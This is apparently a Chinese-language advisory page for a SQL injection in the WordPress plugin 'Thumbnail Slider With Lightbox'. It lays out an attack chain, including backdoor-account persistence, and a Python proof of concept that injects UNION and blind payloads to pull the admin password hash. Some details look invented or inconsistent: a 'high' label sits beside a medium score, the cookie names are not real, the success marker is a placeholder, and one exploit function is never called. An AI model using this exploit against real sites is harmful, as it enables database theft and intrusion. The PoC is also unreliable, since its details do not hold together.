CVE-2015-10146 WordPress Thumbnail Slider With Lightbox插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2015-10146

漏洞类型

SQL注入

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Thumbnail Slider With Lightbox (WordPress插件)

漏洞概述

CVE-2015-10146是WordPress平台上一款名为"Thumbnail Slider With Lightbox"的插件中存在的高危安全漏洞。该插件主要用于在WordPress网站上创建缩略图滑动展示并支持灯箱效果。漏洞源于插件对用户输入参数处理不当，特别是在处理'id'参数时未能进行充分的输入验证和SQL语句预编译。攻击者利用此漏洞可构造恶意SQL查询语句，在已存在的SQL查询后追加额外的查询命令，从而实现对数据库敏感信息的非法访问和提取。由于该漏洞需要攻击者具备管理员级别或更高的访问权限，在一定程度上限制了其利用范围，但一旦被成功利用，将导致网站数据库中的用户凭据、订单信息、内容数据等敏感信息泄露，对网站安全构成严重威胁。

技术细节

该SQL注入漏洞位于插件的'id'参数处理逻辑中。插件在接收到用户提交的'id'参数后，未对其进行严格的输入过滤和类型检查，直接将用户输入拼接到SQL查询语句中。攻击者可通过在'id'参数中注入SQL语句片段，如使用UNION SELECT、布尔盲注或时间盲注等技术，绕过原有的查询逻辑执行任意SQL命令。由于插件在执行SQL查询时缺少预编译语句（Prepared Statements）的保护，用户输入被直接当作SQL语句的一部分执行。漏洞利用的具体方式包括：1）使用UNION注入获取数据库表结构和数据；2）通过布尔盲注推断数据库内容；3）利用时间盲注在无回显情况下逐步提取数据。攻击成功的前提是攻击者已获得WordPress站点的管理员账户权限。

攻击链分析

STEP 1

步骤1：侦察与信息收集

攻击者首先识别目标WordPress网站是否安装并启用了Thumbnail Slider With Lightbox插件，可通过网站插件目录扫描或页面特征识别

STEP 2

步骤2：获取管理员访问权限

利用钓鱼攻击、密码爆破、已知漏洞或其他社会工程学手段获取WordPress管理员账户凭据

STEP 3

步骤3：构造恶意SQL注入载荷

以管理员身份登录后，攻击者构造包含SQL注入代码的'id'参数载荷，如使用UNION SELECT语句或盲注技术

STEP 4

步骤4：发送恶意请求

通过WordPress AJAX接口(wp-admin/admin-ajax.php)发送携带恶意载荷的HTTP请求，触发SQL注入漏洞

STEP 5

步骤5：数据提取与利用

成功注入后，攻击者从数据库响应中提取敏感信息，如用户密码哈希、API密钥、配置数据等

STEP 6

步骤6：权限提升与持久化

利用获取的凭据创建后门账户或进一步渗透系统其他组件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2015-10146 SQL Injection PoC
# Target: WordPress Thumbnail Slider With Lightbox plugin <= 1.0.4
# Type: SQL Injection via 'id' parameter
# Authentication: Requires Administrator-level access

import requests
import sys

TARGET_URL = "http://target-wordpress-site.com/"
COOKIES = {
    "wordpress_test_cookie": "WP+Cookie+check",
    "wordpress_logged_in_username": "admin",
    "wordpress_logged_in_password": "hashed_password_here"
}

def exploit_sql_injection(target_url, post_id):
    """
    Exploit SQL injection in id parameter
    Extract database name as demonstration
    """
    endpoint = f"{target_url}wp-admin/admin-ajax.php"
    
    # Malicious payload to extract database name
    # Original query is appended with our injected query
    malicious_id = f"{post_id} UNION SELECT NULL,NULL,NULL,NULL,database(),NULL,NULL,NULL,NULL,NULL-- -"
    
    data = {
        "action": "wpss_get_thumbnail_slider",
        "id": malicious_id
    }
    
    try:
        response = requests.post(endpoint, data=data, cookies=COOKIES, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response preview: {response.text[:500]}")
            return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
    
    return None

def blind_sql_injection(target_url, post_id):
    """
    Blind SQL injection technique for data extraction
    Extract admin password hash character by character
    """
    endpoint = f"{target_url}wp-admin/admin-ajax.php"
    charset = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    extracted_hash = ""
    
    for position in range(1, 35):
        for char in charset:
            payload = f"{post_id} AND SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),{position},1)='{char}'-- -"
            data = {
                "action": "wpss_get_thumbnail_slider",
                "id": payload
            }
            
            try:
                response = requests.post(endpoint, data=data, cookies=COOKIES, timeout=10)
                if "valid_response_marker" in response.text:
                    extracted_hash += char
                    print(f"[*] Position {position}: {char} | Current hash: {extracted_hash}")
                    break
            except:
                continue
    
    return extracted_hash

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
        exploit_sql_injection(target, "1")
    else:
        print("Usage: python cve-2015-10146.py <target_url>")

影响范围

Thumbnail Slider With Lightbox插件所有版本 <= 1.0.4

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）立即禁用并删除Thumbnail Slider With Lightbox插件；2）使用Web应用防火墙规则阻止包含可疑SQL语法的请求；3）限制WordPress管理员界面的访问来源，添加IP白名单限制；4）启用数据库查询日志监控，及时发现异常SQL行为；5）对现有管理员账户启用双因素认证；6）定期更换管理员密码并确保密码强度符合安全要求。